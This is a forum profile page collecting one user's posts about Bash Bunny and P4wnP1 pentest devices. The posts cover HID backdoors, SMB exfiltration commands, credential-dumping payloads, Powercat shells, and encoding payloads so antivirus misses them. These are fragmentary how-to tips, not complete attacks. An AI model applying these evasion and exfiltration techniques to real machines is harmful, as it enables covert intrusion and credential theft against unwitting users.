
PoSHMagiC0de

Dedicated Members
  • Posts: 618
  • Days Won: 26

Everything posted by PoSHMagiC0de

  1. You will have to put that precompiled version of John on it. It only cracks what is in its wordlist using John. It is for cracking simple passwords, nothing fancy with rules, though I think you could, but man, that would put your pi through the wringer. BB already gets pretty warm; John would probably catch it on fire. I have been playing with it and getting it to work with the new Raspbian Stretch (which it does). I am loving the hidbackdoor. Made a new payload that included it and enabled rndis. I changed the PID to something random. My win10 machine installed the nic in 3 seconds and hid. I could ping back and forth to the pi and the victim. Backdoor payloads worked. Found a way to fire off scripts using the hid channel and agent and get back results. Loving it. Sat in my living room hacking my win10 machine that is in my bedroom through the pi's wap.
  2. Lol, I hear you. I wanted bluetooth when I saw the supreme duck. This thing is a whole new level. But yeah, it is a BB with wifi support. I would almost say it can be a wireless lan turtle too. If you preprogram the wifi for a nearby hotspot, it will connect when powered up. Apply the patch so it says it is a 20GB nic and you probably could flow traffic through it. Pi zero that is.
  3. NP man. I think the ps1 file as it is will do. That is the script. Just load that and run your commands if it doesn't autorun. You could encapsulate it all in a function called "Invoke-ACLight". That way in the joblist.json on the command part you can put invoke-aclight as the command to invoke it. Of course with the rest of the function you can add in the collection part. The BBTPS does deliver the path to the SMB path as a variable you can use to assist. They are named $BB_SMBROOT for the path to the root of the bbtps folder in the loot folder on the bash bunny and $BB_SMBLOOT for the folder with the name of the machine inside the bbtps loot folder. Just use them with a join-path and your filename and it will be there: copy-item -path (join-path $BB_SMBROOT "myexe.exe") -destination "c:\localfolder" and copy-item -path $exfiltrationpath -destination $BB_SMBLOOT
  4. The link to the github is here: https://github.com/mame82/P4wnP1 Not my project. I found out about this late last week and it prompted me to order 2 Raspberry Pi Zero Ws. They came in yesterday and before I posted this I wanted to give it a spin. First off, not trying to list any competing projects to Hak5. I own most of their stuff and love it all. This is just additional as each tool has a use depending on what you want to do and how much time you have, etc. P4wnP1 is a project built on the Pi Zero and Pi Zero W (for the hid_backdoor). It has a few tools like something similar to quickcreds but the system will try and crack them itself with a simple wordlist and if it is guessed it will log into the machine when it is locked. I will let you look at the project github site to see all the things it has; I will talk about its flagship feature. The P4wnP1 was written for Raspbian Jessie. Right now Stretch is out. So, needless to say there are a few issues but the main one is stuff has to be run as sudo versus on Jessie things just ran as root. When I first got it all installed I tried it and found this out when I tried to connect to the hid_backdoor shell. It crashed. I had to install pydispatcher and pycrypto with sudo to fix those. Soon I found out the hidserver would not start. These were easy fixes as all I did was edit the bash scripts to include sudo in the right places. After that the hid_backdoor shell works. So, first thing I tried is just sending ducky commands which worked. I then did the hid_backdoor using firestage1 which ran a powershell command on the machine to load the hid shell into the background. No network connection or anything. The server and agent communicate through an hid channel. I have been looking at the code and am just floored. Right now it does simple commands which are actually powerful enough when used in combination like launching processes, killing them and interacting with them, though I have not been able to interact with a powershell shell I spawn. It also includes a shell you can drop to on the victim that gives you an interactive DOS shell communicating through the hid channel. It leaves itself open for you to script your own payloads as well. Oh, forgot, you connect to it remotely through the Pi Zero W's wifi which is set as an access point on bootup and you ssh into the Pi which drops you into the hidserver app as your shell though you can exit it to the actual pi shell. I used it with my cell phone wifi and an android ssh app to control it while I pranked my boss. If you have pi zero Ws laying around, you have to check out this project.
  5. Speaking of the BBTPS. I got an idea from another project I use on my Pi Zero W. The agent for the BBTPS may become a .NET dll coded in C# that will be loaded reflectively. I hear it reduces the footprint and increases performance, not like it needs a performance boost but it is something to try.
  6. I glanced through that module. It looks like all you need is the ps1 file. The module file just imports all the ps1 files in that folder and I only see 1, so the ACLight.ps1 is the actual file that runs. Issue with it (and understandable why it does it, to conserve memory) is that it creates work files on the drive and ends it with a csv file with the stuff you actually want...unless all those files are what you want. In that case, you can leave the script as is but write a counter script to pick up those files it creates and move them to the BB via SMB, or if it is one file then you may be able to read it in as a string and spit it to the output and the BBTPS will take care of delivering it back to the job file. You will need to create a config file in the config folder named something to identify the payloads that will be running. Look at the samples to see how they are configured. You will need to create a folder in the jobs folder named after the folder name you put in your config folder. Inside that folder put the script. Inside the same folder make a jobs.json file or whatever name you gave it in the config file, but it has to be in json format. Look at samples to see the format. Last thing you need to do is edit the jobselect.txt file in the root to point to the config file for your payload. Order of running is the payload.txt calls jobselect.txt which calls your config that initializes all required environment variables for your jobs. After that it returns to payload.txt to invoke on your config like creating folders, activating attackmodes and running ducky commands to get the agent on the victim when the node server initializes and deliver the jobs listed in the jobs.json file. Data returned on output is sent back to the node server where it is placed in the txt file under your loot folder for that machine under the job name.txt. Other means is to deliver and receive files via SMB. This leads to 2. Yes it can run exes but depends on how you want to run them. Standard way is to have it on the SMB server of the BBTPS and have your script copy it to the machine and run it. If you want it to run separate from the agent you can have a script to copy the exe to the victim and then tell the BBTPS to deliver another script to the agent to be executed as a process to run that file. Last way is if you are really good you could inject it or reflectively invoke it depending on how it was compiled. That is an advanced topic too big to discuss here. So, summary. You can use that script but you will need to do manual collection of the results since it drops it to a file unless you change the script to do otherwise. You also will need to do cleanup of anything you don't collect since it will leave evidence. And it can run exes, though if it is an exe designed to stay I would run it as a process so it is not inside the BBTPS agent and keep it from ending, letting you know it is safe to pull the Bunny.
  7. You may be able to do the same with a wifi extender or a few of these spaced apart. https://eero.com/ The above are wireless mesh devices for extended wifi. Have not tried them.
  8. I can see the confusion with some people and their vision of the Bash Bunny due to it being able to be a keyboard, network card, serial or USB storage. Although it seems like it, the extent of the trust the BB has to the system you are plugging into is the extent of access the device you are pretending to be. Let me summarize why you will not be able to do much with a locked machine with the BB. Let's say the machine is locked and you wanted to use the BB; let's look at the attack modes and what they can do with a locked machine. HID\Keyboard: On the locked machine, can you do anything from the keyboard that is attached to the machine to launch notepad? If not then BB HID attack mode will not either, as it is emulating a keyboard; its access to the system is as far as what a keyboard can do. USB Storage: On the locked machine, if you plugged in a USB memory stick, will you be able to launch notepad on the locked machine? If it is updated you shouldn't be able to read that USB stick until you unlock the machine. Also, autorun is disabled for USB Storage sticks so no dice there. Network: This can best be described as this. If you hooked a Linux machine onto the network on the same subnet as the victim computer and you have the IP, can you make notepad pop up on the victim machine while it is locked? Well, you could if you had the right network credentials to remotely launch it, but if you are trying to launch something without unlocking the machine with the BB I am assuming you do not have credentials. The BB's network connection is like that. It is a machine on another subnet on the 172.16.64.0/24 network. The BB does not automatically have access inside the machine but has a network connection to it. But logically, it is another machine connected via network to the victim machine so all firewall rules and network rules still apply. The only stuff that will work are network attacks like QuickCreds that uses responder, which also works on a PC connected to the same network if we can get the victim to fat finger a resource name not on the internet or on the subnet. So most you can do is fiddle with the network traffic, though I have seen locked machines go silent on networks. Serial: If you plug a serial connection between one computer and the victim, can you remote control it? Well, you cannot unless there is a service listening on that port that allows you to. Since the com port is created when the driver is installed, that will be a big no. So, the type of attacks you can do are in essence another machine connected logically by traditional connections. The purpose of the BB in a pentest is to execute payloads quickly on a vulnerable machine...most likely one that is unlocked. It uses HID to speedily type commands on the victim machine in combination with the other attack modes for delivery, exfiltration or manipulation. It is up to your imagination what you can do.
  9. So, I saw this on Youtube. https://www.youtube.com/watch?v=FsTeedpYeg4 I immediately thought to myself, the BB would benefit from this. This mode could be a 4th switch position or even an initialize mode like BLUETOOTH_ACTIVE. Of course either way you go it would be a new BB since it would need a Bluetooth module. How many things you would have available through the bluetooth I do not know but the remote control ability of that SupremeDuck made me curious.
  10. I'm curious if this is a stand alone or requires bunny connection to run. Cool feature is to have it stand alone and run in background, pull the pic, save a copy under a different name and then use a copy under the original name as the wallpaper. Check in a certain time interval if the wallpaper has been changed from what you had and if so then use the backup to make a copy to the original d/l name and set it as wallpaper again. :-P I would make it a two-fer. Get 2 pics, second is the original modified with text saying "and the ponies keep on coming" or "Stampede". That will be the pic that will be set after the first is unset as wallpaper...or tile it :-)
  11. It would be interesting to find out. Of course the only way would be to get one and play with it. It says it uses GPS. Maybe you can jam it to make it go nuts. Do not know if there is a way to override GPS with your own signal which may be able to spoof it to move by making it think it is somewhere else. I heard he controlled it from his phone. Is it using a cell data card to connect to a cloud that you connect to to control it, or a direct connection? If direct then is it bluetooth or wifi? If wifi, is it open or does it involve the device logging in somehow..same goes for bluetooth and if/how it is pairing to your phone. With bluetooth, maybe you can get a pair with it on a laptop? If wifi, maybe you can connect to it with a laptop...similar to the open wifi the drones have/had. Yeah, reusing their software is not considered a security feature unless that is a proven hardened piece of code. If they have a bug in that package then all software they have that package in will have the same bug.
  12. According to the payload this happens when the bash bunny does not get an IP of the machine. This payload looks to be updated to use firmware version 1.3 due to the GET extensions it is using. It also uses responder, so. Your bunny will need to be updated to firmware 1.3. You will need to make sure you have responder installed; see the tools pinned post for the package and installation instructions. With those, the quickcreds should go to yellow until you get creds. Other than that, maybe the machine is failing to install the RNDIS driver. If you are running this on Windows make sure the RNDIS_ETHERNET attack mode is used, not ECM_ETHERNET.
  13. Windows 10 can handle 2 attack modes. I use HID RNDIS_ETHERNET all the time, I just append on RNDIS_SPEED_10000 so Windows 10 uses the REAL network connection to the internet to use Windows update to get the new drivers. May have to do the same with your combo to get drivers.
  14. So, I did extensive testing of this payload. I have a copy of his mimidogz at the totalp0wn payload so I know the script works. 1) If on Windows 10 with creator update, forget it, it will never work. 2) If you are running a virus scanner like Avast this payload in its current condition may be stopped. Avast I know will stop it. It doesn't stop in the bbtps because I compress and encode it before transferring from the BB to my agent running on the machine, similar to the first script that is pulled down by this payload (ps.md). If you are having issues, try disabling all virus scanners and try again. I have seen red on Windows 10 machines when it pulls nothing; red means it got nothing. Also the quack timings may need to be adjusted for the machine you are adding it to. Maybe a little delay between the gui+r to give the machine time to bring up the run command. Some time after running powershell as admin to allow for powershell to swap and give the admin prompt and even time after hitting alt-y. I also have been adding an extra return after the alt-Y pause in case it is one of those machines that do not prompt for admin permission and just run the command prompt so I can return after my Y and have a clean commandline to run the cradle. Recommendations for improvements. Maybe compressing and encoding md.ps1 before sending it and putting in the p.ps1 file the code to put it back to English and run may help with the virus scanner issues seeing it in transit, but test on win7 with all virus scanners off while this payload is in its current condition.
  15. I did more testing with the powercat script in the totalp0wn payload of the bbtps. On Windows 7 machines it works as intended. On a Windows 10 machine it exhibits the behavior you describe with the session opening and then closing by remote host. Hmmm. When I copy the script to the desktop of the windows 10 machine, load it into a variable as a string and invoke it and then run the function it works. I even tried to do the -NoE option but it fails on the bbtps. May have to modify the agent to not hide the process window so I can see what happens. Yeah, the Connect-Powercat2.ps1 script file is that same module on github but I unfactored it so it can be one file and be loaded and fired off as a payload without touching disk. I planned on doing some docs on the modules in the totalp0wn job list but originally built that joblist as an example of what I would use as a combo payload in the BBTPS. Didn't think it would be popular.
  16. More like a merge. Trying to decide how to decide which db data takes precedence. Reason is the WiGLE db stores the signal strength of the AP while kismet does not from what I can tell. In my kismet db the fields for signal strength show zero. I planned on using strength and time to determine if a record is to be updated. I am thinking of making the DB backend that brings them together in MongoDB for flexibility. Maybe after evolution and the structure solidifies I will go to mysql.
  17. So...you don't want to run unix commands without a terminal?
  18. I spent all weekend looking through those payloads figuring out which one I should update. I got overwhelmed. Going to just need people to suggest which one needs looking over the most and start there. Summary. The BB is an ARM machine running linux. It has its root partition that it boots from and a nang (I think it is called that) that is usually mapped as udisk for payloads and exfiltrated data. If you make a payload with just a network connection you can ssh into it and explore it. The BB comes with some helpers for you. Like in the shell it has the udisk command to mount and format the partition that is mounted and payloads are run from. For the payloads themselves there are helper functions to get you the IP address of the bunny and clients, switch position, and hostnames. The wiki has their uses. I looked in the past for a way to run my payloads hidden in linux and found a way but it works best when the payload is encompassed into a script ie python, perl, bash, whatever. The key here is the nohup command in linux. I do not know if it is there in MacOS but I have always seen it in linux. If I use it like so against my payload script it will be:

      nohup bash ./myscript.sh & exit

      nohup keeps your script from closing when you close the terminal. Of course you can only see the process in "top", if it is still running. It also writes all output to a nohup.out file. I have found that while prethinking of a way to make an agent run hidden on linux, since I had no takers on writing the python agent for the BBTPS for linux and OSX, I am going to have to do it as soon as I figure out how to run a separate process from python detached from the current python instance (like start-process in powershell for windows).
  19. Because the login name is used as part of the key for the hash. You need the login info, domain too if it was included. Hashes should always include the username they belong to when passed. Do not know why Quickcreds is not getting it.
  20. I have been tinkering around with an idea I plan on writing in python. It is to query and handle the SQLite files handled by kismet and WiGLE for android. Want to be able to combine them into 1 common database with more open query options to export results to kml files.
  21. Nope. That is making the folders on the local BB to gather the loot in.
  22. And if you need third party I have heard some good things about KnowBe4. Have not used them myself but have a friend who is an engineer at a company that does and he boasted about them and their phishing templates.
  23. I am thinking @ccolins should do the video for the BBTPS. From what I read above he has it down pat.
  24. Weird. I combined all the modules for the original Powercat into one so it can run directly from download and the BBTPS should be firing it off as a separate process so the BB ending should not affect it. Pretty much followed what the command that deploys netcat as a payload does to build it. I will have to test it again to see this but it should be loaded the minute you run it in memory. Yeah, I like Powercat. I use it on Windows machines sometimes to scan for ports and stuff when I do not want to run netcat on windows. Plus sometimes the self-contained deployment of netcat is detected as malicious by some virus scanners.
  25. I use the daniel miessler seclists too. I usually remove the lists with counts and I already cleaned up the darkc0de list of the counts before adding it to my main list a year ago. I then use dymerge to combine them all into a new list that is sorted and unique and then combine that with my master. I do this every once in awhile and any passwords that were cracked by a rulelist I add to the list. My 970 only pulls 113kH/s on wpa. I see wpa really drags down the system even with 2 1070s compared to the other hashes. Awesome.